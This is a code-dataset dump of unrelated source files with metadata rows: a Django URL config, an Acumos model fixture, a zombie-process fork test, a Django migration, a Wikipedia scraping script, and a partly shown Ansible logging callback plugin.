| 31.241573 | 156 | 0.517173 | 795 | 5,561 | 3.574843 | 0.226415 | 0.028149 | 0.028501 | 0.025334 | 0.348698 | 0.237861 | 0.167488 | 0.163969 | 0.065447 | 0.040816 | 0 | 0.047188 | 0.264521 | 5,561 | 177 | 157 | 31.418079 | 0.647677 | 0.048013 | 0 | 0.1 | 0 | 0 | 0.124433 | 0.029501 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.026667 | null | null | 0.073333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfe32d1805ca5c9b99d405aebfbc9ec70014e365 | 1,702 | py | Python | vaultier/vaultier/urls_api.py | dz0ny/Vaultier | e23d86c7576f4785b4e369242d7b5f7125e4d8c6 | [
"BSD-3-Clause"
] | 30 | 2015-07-13T11:11:23.000Z | 2021-01-25T14:21:18.000Z | vaultier/vaultier/urls_api.py | corpusops/vaultier | 3baef4346add0b3bdff322257467f74b2a0c856c | [
"BSD-3-Clause"
] | null | null | null | vaultier/vaultier/urls_api.py | corpusops/vaultier | 3baef4346add0b3bdff322257467f74b2a0c856c | [
"BSD-3-Clause"
] | 31 | 2015-08-10T12:10:16.000Z | 2020-09-18T09:43:28.000Z | from django.conf.urls import patterns, url
from rest_framework import routers
from accounts.api import UserViewSet, LostKeyViewSet, AuthView, MemberViewSet
from nodes.api import NodeViewSet, NodePathView, NodeDataView, PolicyViewSet
from news.api import NewsApiView
from search.api import SearchView
from vaultier.views import ConfigView
# todo: move
from workspaces.api import WorkspaceKeyViewSet, InvitationViewSet
from vaultier.api import ServerTimeView
router = routers.DefaultRouter()
router.register(r'users', UserViewSet, base_name='user')
router.register(r'nodes', NodeViewSet, base_name='node')
router.register(r'workspace_keys', WorkspaceKeyViewSet,
base_name='workspace_key')
router.register(r'members', MemberViewSet, base_name='member')
router.register(r'invitations', InvitationViewSet, base_name='invitation')
router.register(r'roles', PolicyViewSet, base_name='role')
router.register(r'lost_keys', LostKeyViewSet, base_name='lost_keys')
urlpatterns = router.urls
urlpatterns += patterns(
'',
url(r'^config/', ConfigView.as_view(), name='config'),
# node path
url(r'^nodes/(?P<pk>\d+)/path/$', NodePathView.as_view(),
name='node-path'),
# node data
url(r'^nodes/(?P<pk>\d+)/data/$', NodeDataView.as_view(),
name='node-data'),
# server time
url(r'^server-time/$', ServerTimeView.as_view(),
name='server_time'),
# news
url(r'^news/$', NewsApiView.as_view(), name='news-list'),
# search
url(r'^search/search$', SearchView.as_view(), name='search-search'),
# auth
url(r'^auth/auth$', AuthView.as_view(), name='auth-auth'),
url(r'^auth/user$', UserViewSet.as_view(), name='auth-user'),
)
| 37.822222 | 77 | 0.716804 | 216 | 1,702 | 5.550926 | 0.305556 | 0.026689 | 0.066722 | 0.016681 | 0.021685 | 0.021685 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 1,702 | 44 | 78 | 38.681818 | 0.810135 | 0.034665 | 0 | 0 | 0 | 0 | 0.181651 | 0.030581 | 0 | 0 | 0 | 0.022727 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cff1acb028a442105c7a88da1c72d65ee9945c3b | 1,416 | py | Python | adapter/acumos/tests/fixtures/models/example-model-listofm/example_model.py | onap/dcaegen2-platform | 9e930892d28fc4a3378fad8f942c9f91cffe4698 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | adapter/acumos/tests/fixtures/models/example-model-listofm/example_model.py | onap/dcaegen2-platform | 9e930892d28fc4a3378fad8f942c9f91cffe4698 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | adapter/acumos/tests/fixtures/models/example-model-listofm/example_model.py | onap/dcaegen2-platform | 9e930892d28fc4a3378fad8f942c9f91cffe4698 | [
"Apache-2.0",
"CC-BY-4.0"
] | 1 | 2021-10-15T15:02:20.000Z | 2021-10-15T15:02:20.000Z | # ============LICENSE_START====================================================
# org.onap.dcae
# =============================================================================
# Copyright (c) 2019 AT&T Intellectual Property. All rights reserved.
# =============================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END======================================================
from acumos.session import AcumosSession
from acumos.modeling import Model, List, NamedTuple
class Args(NamedTuple):
    # one pair of integer addends consumed by the ``sum`` model method
    x: int
    y: int
class ArgsList(NamedTuple):
    # wrapper record holding the batch of Args pairs (acumos list-of-messages fixture)
    args: List[Args]
def sum(args: ArgsList) -> List[int]:
    """Return x + y for every Args pair wrapped in *args*.

    The name deliberately shadows the builtin ``sum``: Acumos exposes the
    function name as the model method name.
    """
    # BUG FIX: iterating the ArgsList NamedTuple itself yields its single
    # field (the list object), so ``arg.x`` would raise AttributeError.
    # Iterate the wrapped list instead.
    return [pair.x + pair.y for pair in args.args]
if __name__ == '__main__':
    '''Main'''
    # Wrap ``sum`` as an Acumos model and serialize it into ./example-model
    # for the adapter tests to consume.
    model = Model(sum=sum)
    session = AcumosSession()
    session.dump(model, 'example-model', '.')
| 33.714286 | 80 | 0.552966 | 158 | 1,416 | 4.892405 | 0.607595 | 0.07762 | 0.033635 | 0.041397 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006826 | 0.172316 | 1,416 | 41 | 81 | 34.536585 | 0.65273 | 0.646893 | 0 | 0 | 0 | 0 | 0.051044 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0.076923 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
cff604b05a37b829ebc45bdab750338b3e114a56 | 410 | py | Python | test-grandchild-zombie.py | tsaarni/11th-init | 32e28cfafbd8c12a1dc369dae54bce13a7c819e4 | [
"Apache-2.0"
] | null | null | null | test-grandchild-zombie.py | tsaarni/11th-init | 32e28cfafbd8c12a1dc369dae54bce13a7c819e4 | [
"Apache-2.0"
] | null | null | null | test-grandchild-zombie.py | tsaarni/11th-init | 32e28cfafbd8c12a1dc369dae54bce13a7c819e4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env -S python3 -u
import os
import time
# Process-tree demo: the parent stays alive while its child forks a
# grandchild and exits, so the grandchild gets reparented to the init
# process under test.
pid = os.fork()
if pid != 0:
    # parent: keep the tree alive long enough to observe reaping
    print("Child pid={}".format(pid))
    time.sleep(999999)
else:
    time.sleep(1)
    # child forks grandchild and exits
    pid2 = os.fork()
    if pid2 != 0:
        # the grandchild (else branch) exits immediately; since the child
        # never wait()s, the grandchild is a zombie during this 5s window
        print("Grandchild pid={}".format(pid2))
        time.sleep(5)
        print("Child exits and grandchild becomes zombie")
    else:
        # grandchild exits and becomes zombie
        pass
| 19.52381 | 54 | 0.646341 | 61 | 410 | 4.344262 | 0.47541 | 0.101887 | 0.060377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043344 | 0.212195 | 410 | 20 | 55 | 20.5 | 0.77709 | 0.236585 | 0 | 0.133333 | 0 | 0 | 0.225806 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.133333 | 0 | 0.133333 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
cff6ef64731c31c3337a745a26d8620d5ecfffab | 1,024 | py | Python | HuberyBlog/extra_apps/django_comments/migrations/0004_auto_20190130_1520.py | SomnambulistOfChina/ChineseSomnambulist | dc6efcb4ea1bc02f8999cd78bebfd648253631a6 | [
"Apache-2.0"
] | 5 | 2019-05-21T08:26:18.000Z | 2021-07-20T11:32:49.000Z | HuberyBlog/extra_apps/django_comments/migrations/0004_auto_20190130_1520.py | SomnambulistOfChina/ChineseSomnambulist | dc6efcb4ea1bc02f8999cd78bebfd648253631a6 | [
"Apache-2.0"
] | null | null | null | HuberyBlog/extra_apps/django_comments/migrations/0004_auto_20190130_1520.py | SomnambulistOfChina/ChineseSomnambulist | dc6efcb4ea1bc02f8999cd78bebfd648253631a6 | [
"Apache-2.0"
] | 2 | 2019-07-20T08:35:04.000Z | 2020-02-29T07:34:42.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2019-01-30 15:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django (1.11.7): adds threaded-reply fields
    # (replay_name/replay_to/root_id) and updated Meta options on the
    # comment model.  Field/option values must not be edited by hand.
    # NOTE(review): 'replay_*' looks like a typo for 'reply_*', but renaming
    # the columns now would require a follow-up migration.
    dependencies = [
        ('django_comments', '0003_add_submit_date_index'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='comment',
            options={'ordering': ('submit_date',), 'permissions': [('can_moderate', 'Can moderate comments')], 'verbose_name': '评论', 'verbose_name_plural': '评论'},
        ),
        migrations.AddField(
            model_name='comment',
            name='replay_name',
            field=models.CharField(blank=True, max_length=50),
        ),
        migrations.AddField(
            model_name='comment',
            name='replay_to',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='comment',
            name='root_id',
            field=models.IntegerField(default=0),
        ),
    ]
| 29.257143 | 162 | 0.584961 | 102 | 1,024 | 5.656863 | 0.588235 | 0.076257 | 0.119584 | 0.140381 | 0.325823 | 0.218371 | 0.152513 | 0 | 0 | 0 | 0 | 0.034014 | 0.282227 | 1,024 | 34 | 163 | 30.117647 | 0.75102 | 0.066406 | 0 | 0.444444 | 1 | 0 | 0.203568 | 0.027282 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cff7b4aaadc6503b4d3c0b54bed2cfd5a237b248 | 1,489 | py | Python | inputs/stations/extract_china_station_raw.py | bearlin/tool_get_famous_scenery_station_airport_and_their_scws_tokens | 210adf69118065e01d7ae50e57b7c773a1a1bd65 | [
"MIT"
] | null | null | null | inputs/stations/extract_china_station_raw.py | bearlin/tool_get_famous_scenery_station_airport_and_their_scws_tokens | 210adf69118065e01d7ae50e57b7c773a1a1bd65 | [
"MIT"
] | null | null | null | inputs/stations/extract_china_station_raw.py | bearlin/tool_get_famous_scenery_station_airport_and_their_scws_tokens | 210adf69118065e01d7ae50e57b7c773a1a1bd65 | [
"MIT"
] | null | null | null | #!/usr/bin/python
from sys import argv
import re
import codecs
print "Start."
script, filename = argv
print "script: %r." % script
print "filename: %r." % filename
print "Opening the rawfile..."
rawfile = codecs.open(filename, 'r', encoding='utf-8')
dumpfile = codecs.open(filename + ".dump", 'w', encoding='utf-8')
# Feed the rawfile into findall(); it returns a list of all the found strings
pattern = re.compile("<li><a\ href=\"/wiki/[^U].*title=\".*</a></li>")
strings = re.findall(pattern, rawfile.read())
print "%r" % (strings)
# Processing matched strings
lineCount=0
for string in strings:
lineCount = lineCount + 1
print "Processing[%d]:%s" % (lineCount, string)
strtmp1 = string.rstrip('</a></li>').lstrip()
#print "after strip end:%s" % (strtmp1)
keyIdx = strtmp1.index('title=\"')
startIdx = keyIdx + 7
endIdx = len(strtmp1)
#print "keyIdx:%r" % (keyIdx)
#print "startIdx:%r" % (startIdx)
#print "endIdx:%r" % (endIdx)
strtmp2 = strtmp1[startIdx:endIdx]
keyIdx = strtmp2.index('>')
startIdx = keyIdx + 1
endIdx = len(strtmp2)
#print "keyIdx:%r" % (keyIdx)
#print "startIdx:%r" % (startIdx)
#print "endIdx:%r" % (endIdx)
strtmp3 = strtmp2[startIdx:endIdx]
strtmp4 = strtmp3.lstrip().rstrip() # strip white space characters
if strtmp4 == '':
continue
print "After stripped:%s" % (strtmp4)
# Write stripped result to dumpfile
dumpfile.write(strtmp4)
dumpfile.write("\n")
dumpfile.close()
rawfile.close()
print "Done."
| 26.122807 | 77 | 0.661518 | 193 | 1,489 | 5.103627 | 0.414508 | 0.018274 | 0.036548 | 0.036548 | 0.117767 | 0.117767 | 0.117767 | 0.117767 | 0.117767 | 0.117767 | 0 | 0.016813 | 0.161182 | 1,489 | 56 | 78 | 26.589286 | 0.771817 | 0.26595 | 0 | 0 | 0 | 0 | 0.143386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.085714 | null | null | 0.228571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cffe84fc8998209b2c270a0a862cd75d59cdea30 | 19,967 | py | Python | APMSSO_Ansible/plugins/callback/apmsso_callback_log.py | CA-APM/infra-agent-automation | 172bc08ba9d911e904f1bf61bd7e5a6cecbc58b1 | [
"Apache-2.0"
] | null | null | null | APMSSO_Ansible/plugins/callback/apmsso_callback_log.py | CA-APM/infra-agent-automation | 172bc08ba9d911e904f1bf61bd7e5a6cecbc58b1 | [
"Apache-2.0"
] | null | null | null | APMSSO_Ansible/plugins/callback/apmsso_callback_log.py | CA-APM/infra-agent-automation | 172bc08ba9d911e904f1bf61bd7e5a6cecbc58b1 | [
"Apache-2.0"
] | 1 | 2020-10-27T11:21:47.000Z | 2020-10-27T11:21:47.000Z | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: default
type: stdout
short_description: Ansible Screen Output and Create log file
version_added: historical
description:
- This is the CA apmia output callback for ansible-playbook.
extends_documentation_fragment:
- default_callback
requirements:
- set as stdout in configuration
'''
from ansible import constants as C
from ansible.playbook.task_include import TaskInclude
from ansible.plugins.callback import CallbackBase
from ansible.utils.color import colorize, hostcolor
from datetime import datetime
import os
import re
import sys
import thread
import time
import multiprocessing
import threading
import os.path
import string
class CallbackModule(CallbackBase):
    '''
    This is the default callback interface, which simply prints messages
    to stdout when new callback events are received.
    '''
    CALLBACK_VERSION = 2.0
    CALLBACK_TYPE = 'stdout'
    CALLBACK_NAME = 'apmsso_callback_log'
    # The ``global`` declarations below make the subsequent class-body
    # assignments (and the ``def print_star`` further down) bind at *module*
    # level, which is why the methods can reference ``f``, ``host_list`` and
    # ``print_star`` as bare names.  ``fil`` is never assigned at class level,
    # so that declaration has no effect here.
    global print_star
    global f
    global fil
    global host_list
    host_list = []
    # NOTE(review): import-time side effects — the log file is opened (and
    # never closed) and scratch files are deleted as soon as this module is
    # loaded, not when a playbook actually starts.
    f = open('apmsso_ansible.log', "a")
    if os.path.exists('temp_abc') == True:
        os.remove('temp_abc')
    if os.path.exists('report.log') == True:
        os.remove('report.log')
    if os.path.exists('comment_temp') == True:
        os.remove('comment_temp')
    if os.path.exists('msg_temp') == True:
        os.remove('msg_temp')
    def __init__(self):
        """Initialise the callback; the current play is tracked in _play."""
        self._play = None
        super(CallbackModule, self).__init__()
    def print_star(msg):
        # Progress "spinner": prints dots to stdout.  Bound as a module-level
        # function via the class-body ``global print_star`` above, so the
        # threading.Thread(target=print_star, ...) calls resolve it without
        # a ``self`` argument.
        sys.stdout.write("\033[K")
        while True:
            sys.stdout.flush()
            print("......", end='')
            time.sleep(0.5)
            # NOTE(review): for the "start" threads msg != "stop" is true, so
            # the loop exits after a single burst of dots; the condition looks
            # inverted.  The "stop" threads created by the handlers are never
            # .start()ed, so the non-terminating msg == "stop" path never runs.
            if msg != "stop":
                break
        print(end="\r")
        sys.stdout.write("\033[K")
    def v2_runner_on_failed(self, command_result, ignore_errors=False):
        """Log a failed task result to apmsso_ansible.log and temp_abc."""
        # NOTE(review): ``fil`` is only closed on the non-loop branch below;
        # when the task has loop results the handle leaks.
        fil = open('temp_abc', "a")
        t1 = threading.Thread(target=print_star, args=("start",))
        t1.start()
        dele_variables = command_result._result.get('_ansible_dele_variables', None)
        if self._play.strategy == 'free' and self._last_task_banner != command_result._task._uuid:
            self._print_task_banner(command_result._task)
        self._handle_exception(command_result._result)
        self._handle_warnings(command_result._result)
        if command_result._task.loop and 'results' in command_result._result:
            self._process_items(command_result)
        else:
            # delegated tasks log "[host -> delegate]", others just "[host]"
            if dele_variables:
                f.writelines("%s-----fatal: [%s -> %s]: FAILED! => %s\n" % (datetime.now(), command_result._host.get_name(), dele_variables['ansible_host'], self._dump_results(command_result._result)))
            else:
                f.writelines("%s-----fatal: [%s]: FAILED! => %s\n" % (datetime.now(), command_result._host.get_name(), self._dump_results(command_result._result)))
            fil.writelines("\n%s Fail %s" % (command_result._host.get_name(), self._dump_results(command_result._result)))
            fil.close()
        if ignore_errors:
            self._display.display("...ignoring", color=C.COLOR_SKIP)
            f.writelines("%s-----...ignoring\n" % (datetime.now()))
        # NOTE(review): this "stop" thread is created but never started
        t1 = threading.Thread(target=print_star, args=("stop",))
    def v2_runner_on_ok(self, command_result):
        """Log an ok/changed task result to apmsso_ansible.log."""
        t2 = threading.Thread(target=print_star, args=("start",))
        t2.start()
        dele_variables = command_result._result.get('_ansible_dele_variables', None)
        if self._play.strategy == 'free' and self._last_task_banner != command_result._task._uuid:
            self._print_task_banner(command_result._task)
        if isinstance(command_result._task, TaskInclude):
            return
        elif command_result._result.get('changed', False):
            if dele_variables:
                msg = "changed: [%s -> %s]" % (command_result._host.get_name(), dele_variables['ansible_host'])
                msg1 = ""
            else:
                msg = "changed: [%s]" % command_result._host.get_name()
                msg1 = ""
            color = C.COLOR_CHANGED
        else:
            if dele_variables:
                msg = "ok: [%s -> %s]" % (command_result._host.get_name(), dele_variables['ansible_host'])
                msg1=""
            else:
                msg = "ok: [%s]" % command_result._host.get_name()
                msg1=""
            color = C.COLOR_OK
        self._handle_warnings(command_result._result)
        if command_result._task.loop and 'results' in command_result._result:
            self._process_items(command_result)
        else:
            # at verbosity > 0 (or verbose_always) append the full result dump;
            # msg goes to the log file, msg1 is shown on screen
            if (self._display.verbosity > 0 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
                if command_result._task.action == 'debug' and 'changed' in command_result._result:
                    del command_result._result['changed']
                msg += " => %s" % (self._dump_results(command_result._result),)
                msg1 = "%s" % (self._dump_results(command_result._result),)
            if msg1 != "":
                self._display.display(msg1, color=color)
        f.writelines("%s-----%s\n" % (datetime.now(), msg))
        # NOTE(review): this "stop" thread is created but never started
        t2 = threading.Thread(target=print_star, args=("stop",))
    def v2_runner_on_skipped(self, command_result):
        """Log a skipped task result (when skipped-host display is enabled)."""
        t3 = threading.Thread(target=print_star, args=("start",))
        t3.start()
        if self._plugin_options.get('show_skipped_hosts', C.DISPLAY_SKIPPED_HOSTS): # fallback on constants for inherited plugins missing docs
            if self._play.strategy == 'free' and self._last_task_banner != command_result._task._uuid:
                self._print_task_banner(command_result._task)
            if command_result._task.loop and 'results' in command_result._result:
                self._process_items(command_result)
            else:
                msg = "skipping: [%s]" % command_result._host.get_name()
                if (self._display.verbosity > 0 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
                    msg += " => %s" % self._dump_results(command_result._result)
                f.writelines("%s-----%s\n" % (datetime.now(), msg))
        t3 = threading.Thread(target=print_star, args=("stop",))
    def v2_runner_on_unreachable(self, command_result):
        """Log an unreachable host to apmsso_ansible.log and temp_abc."""
        fil = open('temp_abc', "a")
        t4 = threading.Thread(target=print_star, args=("start",))
        t4.start()
        if self._play.strategy == 'free' and self._last_task_banner != command_result._task._uuid:
            self._print_task_banner(command_result._task)
        dele_variables = command_result._result.get('_ansible_dele_variables', None)
        if dele_variables:
            f.writelines("fatal: [%s -> %s]: UNREACHABLE! => %s\n" % (command_result._host.get_name(), dele_variables['ansible_host'], self._dump_results(command_result._result)))
        else:
            f.writelines("fatal: [%s]: UNREACHABLE! => %s\n" % (command_result._host.get_name(), self._dump_results(command_result._result)))
        fil.writelines("\n%s Unreach %s" % (command_result._host.get_name(), self._dump_results(command_result._result)))
        fil.close()
        t4 = threading.Thread(target=print_star, args=("stop",))
    def v2_playbook_on_no_hosts_matched(self):
        """Report and log that the play matched no hosts."""
        t5 = threading.Thread(target=print_star, args=("start",))
        t5.start()
        self._display.display("skipping: no hosts matched", color=C.COLOR_SKIP)
        f.writelines("%s-----skipping: no hosts matched\n" % (datetime.now()))
        t5 = threading.Thread(target=print_star, args=("stop",))
    def v2_playbook_on_no_hosts_remaining(self):
        """Log that all hosts have failed out of the play."""
        t6 = threading.Thread(target=print_star, args=("start",))
        t6.start()
        f.writelines("%s-----NO MORE HOSTS LEFT\n" % (datetime.now()))
        t6 = threading.Thread(target=print_star, args=("stop",))
    def v2_playbook_on_task_start(self, task, is_conditional):
        """Log a task start (free-strategy plays log via the task banner instead)."""
        t7 = threading.Thread(target=print_star, args=("start",))
        t7.start()
        if self._play.strategy != 'free':
            f.writelines("%s-----%s\n" % (datetime.now(), task))
        t7 = threading.Thread(target=print_star, args=("stop",))
    def _print_task_banner(self, task):
        """Write the TASK [...] banner (and task path at verbosity >= 2) to the log."""
        t8 = threading.Thread(target=print_star, args=("start",))
        t8.start()
        args = ''
        # include task args in the banner only when globally allowed and the
        # task is not no_log
        if not task.no_log and C.DISPLAY_ARGS_TO_STDOUT:
            args = u', '.join(u'%s=%s' % a for a in task.args.items())
            args = u' %s' % args
        f.writelines(u"%s-----TASK [%s%s]\n" % (datetime.now(), task.get_name().strip(), args))
        if self._display.verbosity >= 2:
            path = task.get_path()
            if path:
                f.writelines(u"%s-----task path: %s\n" % (datetime.now(), path))
        # remember which task's banner was printed (checked by the handlers)
        self._last_task_banner = task._uuid
        t8 = threading.Thread(target=print_star, args=("stop",))
    def v2_playbook_on_cleanup_task_start(self, task):
        """Log the start of a cleanup task."""
        t9 = threading.Thread(target=print_star, args=("start",))
        t9.start()
        f.writelines("%s-----CLEANUP TASK [%s]\n" % (datetime.now(), task.get_name().strip()))
        t9 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_handler_task_start(self, task):
t10 = threading.Thread(target=print_star, args=("start",))
t10.start()
f.writelines("%s-----RUNNING HANDLER [%s]\n" % task.get_name().strip())
t10 = threading.Thread(target=print_star, args=("stop",))
    def v2_playbook_on_play_start(self, play):
        """Log the PLAY banner and remember the current play in self._play."""
        t11 = threading.Thread(target=print_star, args=("start",))
        t11.start()
        name = play.get_name().strip()
        if not name:
            msg = u"PLAY"
        else:
            msg = u"PLAY [%s]" % name
        self._play = play
        f.writelines("%s-----%s\n" % (datetime.now(), msg))
        t11 = threading.Thread(target=print_star, args=("stop",))
    def v2_on_file_diff(self, command_result):
        """Log diffs for changed results (per item for loop tasks)."""
        t12 = threading.Thread(target=print_star, args=("start",))
        t12.start()
        if command_result._task.loop and 'results' in command_result._result:
            for res in command_result._result['results']:
                if 'diff' in res and res['diff'] and res.get('changed', False):
                    diff = self._get_diff(res['diff'])
                    if diff:
                        f.writelines("%s-----%s\n" % (datetime.now(), diff))
        elif 'diff' in command_result._result and command_result._result['diff'] and command_result._result.get('changed', False):
            diff = self._get_diff(command_result._result['diff'])
            if diff:
                f.writelines("%s-----%s\n" % (datetime.now(), diff))
        t12 = threading.Thread(target=print_star, args=("stop",))
    def v2_runner_item_on_ok(self, command_result):
        """Log an ok/changed loop item result."""
        t13 = threading.Thread(target=print_star, args=("start",))
        t13.start()
        dele_variables = command_result._result.get('_ansible_dele_variables', None)
        if isinstance(command_result._task, TaskInclude):
            return
        elif command_result._result.get('changed', False):
            msg = 'changed'
            color = C.COLOR_CHANGED
        else:
            msg = 'ok'
            color = C.COLOR_OK
        if dele_variables:
            msg += ": [%s -> %s]" % (command_result._host.get_name(), dele_variables['ansible_host'])
        else:
            msg += ": [%s]" % command_result._host.get_name()
        msg += " => (item=%s)" % (self._get_item(command_result._result),)
        if (self._display.verbosity > 0 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
            msg += " => %s" % self._dump_results(command_result._result)
        f.writelines("%s-----%s\n" % (datetime.now(), msg))
        # NOTE(review): ``color`` is computed but never used — the message is
        # only written to the log file, never displayed.
        t13 = threading.Thread(target=print_star, args=("stop",))
    def v2_runner_item_on_failed(self, command_result):
        """Log a failed loop item result."""
        t14 = threading.Thread(target=print_star, args=("start",))
        t14.start()
        dele_variables = command_result._result.get('_ansible_dele_variables', None)
        self._handle_exception(command_result._result)
        msg = "failed: "
        if dele_variables:
            msg += "[%s -> %s]" % (command_result._host.get_name(), dele_variables['ansible_host'])
        else:
            msg += "[%s]" % (command_result._host.get_name())
        self._handle_warnings(command_result._result)
        f.writelines("%s-----%s (item=%s) => %s\n" % (datetime.now(), msg, self._get_item(command_result._result), self._dump_results(command_result._result)))
        t14 = threading.Thread(target=print_star, args=("stop",))
    def v2_runner_item_on_skipped(self, command_result):
        """Log a skipped loop item (when skipped-host display is enabled)."""
        t15 = threading.Thread(target=print_star, args=("start",))
        t15.start()
        if self._plugin_options.get('show_skipped_hosts', C.DISPLAY_SKIPPED_HOSTS): # fallback on constants for inherited plugins missing docs
            msg = "skipping: [%s] => (item=%s) " % (command_result._host.get_name(), self._get_item(command_result._result))
            if (self._display.verbosity > 0 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
                msg += " => %s" % self._dump_results(command_result._result)
            f.writelines("%s-----%s\n" % (datetime.now(), msg))
        t15 = threading.Thread(target=print_star, args=("stop",))
    def v2_playbook_on_include(self, included_file):
        """Log which file was included and for which hosts."""
        t16 = threading.Thread(target=print_star, args=("start",))
        t16.start()
        msg = 'included: %s for %s' % (included_file._filename, ", ".join([h.name for h in included_file._hosts]))
        f.writelines("%s-----%s\n" % (datetime.now(), msg))
        t16 = threading.Thread(target=print_star, args=("stop",))
    def v2_playbook_on_stats(self, stats):
        """Render the end-of-run summary tables from the scratch files.

        Reads msg_temp (per-host configuration changes), comment_temp (the
        command/environment label), report.log and temp_abc (per-host
        outcomes), prints two colored ANSI tables to stdout, mirrors the
        first table into apmsso_ansible.log, then deletes the scratch files.
        """
        max_length = []  # NOTE(review): unused
        hn = ""
        cn = ""
        st = ""
        outp = ""
        mt = []
        change_host_list = []
        #########################################################################################################################
        # Table 1: "Configuration Changed in Each Host" from msg_temp
        # (each line: "<host> <message>")
        if os.path.exists('msg_temp') == True:
            mt1=open('msg_temp')
            max_length_line = len(max(open('msg_temp', 'r'), key=len))
            if max_length_line+10 >= 168:
                max_length_line = 158
            for line in mt1:
                mt.append(line.split(None, 1))
            if len(mt) != 0:
                for itm in range(len(mt)):
                    change_host_list.append(mt[itm][0])
                change_host_list = set(change_host_list)
                print("\n")
                f.writelines("%s\n" % (datetime.now()))
                for i in range(max_length_line+10):
                    print("\033[34m-\033[0m", end = '')
                    f.write("-")
                print("\033[36m\nConfiguration Changed in Each Host\033[0m")
                f.writelines("\nConfiguration Changed in Each Host\n")
                for i in range(max_length_line+10):
                    print("\033[34m-\033[0m", end = '')
                    f.write("-")
                for itm in change_host_list:
                    print("\n\033[1;36m%s\033[0m" % (itm))
                    f.writelines("\n%s" % (itm))
                    for itms in range(len(mt)):
                        if mt[itms][0] == itm:
                            print("\t\033[1;36m*\033[0m \033[93m%s\033[0m " % (mt[itms][1]))
                            f.writelines("\n\t* %s" % (mt[itms][1]))
                for i in range(max_length_line+10):
                    print("\033[34m-\033[0m", end = '')
                    f.write("-")
                print("\n")
                f.writelines("\n")
            mt1.close()
        #########################################################################################################################
        # Table 2: "Output of Ansible Command" — per-host status rows gathered
        # from report.log and temp_abc, labelled with the comment_temp value
        command_temp="NA"
        if os.path.exists('comment_temp') == True:
            ct = open('comment_temp')
            for line in ct:
                command_temp = line
            os.remove('comment_temp')
        if os.path.exists('report.log') == True:
            rf = open('report.log')
            for line in rf:
                if len(line.strip()) == 0:
                    pass
                else:
                    host_list.append(line.split(None, 3))
        if os.path.exists('temp_abc') == True:
            fii = open('temp_abc', "r")
            for line in fii:
                if len(line.strip()) == 0:
                    pass
                else:
                    # temp_abc lines are "<host> <Fail|Unreach> <details>"
                    str1, str2, str3 = line.split(None, 2)
